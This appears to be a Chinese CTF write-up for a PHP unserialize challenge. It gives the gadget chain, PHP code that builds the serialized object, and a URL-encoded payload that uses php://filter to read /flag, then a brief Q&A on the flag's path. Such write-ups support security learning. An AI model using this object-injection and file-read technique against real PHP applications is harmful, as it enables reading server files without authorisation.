一、解题流程

1、链条：Road_is_Long（construct->wakeup【page=$r】-> toString【string=$m】）-> Make_a_Change（construct->get【effort=$t】）-> Try_Work_Hard（invoke->append【var='php://filter/read=convert.base64-encode/resource=/flag'】）
2、根据链条：编写代码

<?php
class Road_is_Long{public $page;public $string;
}
class Try_Work_Hard{protected  $var = "php://filter/read=convert.base64-encode/resource=/flag";
}
class Make_a_Change{public $effort;
} $r = new Road_is_Long();
$t = new Try_Work_Hard();
$m = new Make_a_Change();
$r->page=$r;
$r->string=$m;
$m->effort=$t;//echo serialize($r);
echo urlencode(serialize($r));
?>

3、payload=O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Br%3A1%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A54%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7D

4、通过payload得到flag的base64编码，解密得到flag即可

二、小小疑惑

疑问：/flag能获取是因为在根目录下吗？为什么写/flag.php就不行？如果对.过滤的话，应该会echo “You can Not Enter 2022”;才对啊？
解答：这道题是2022年出的，这道题目下方提示flag.php文件，说明flag.php在当前目录下，但是答案是在根目录下，且是flag文件，所以个人认为是后面这台环境变了的问题。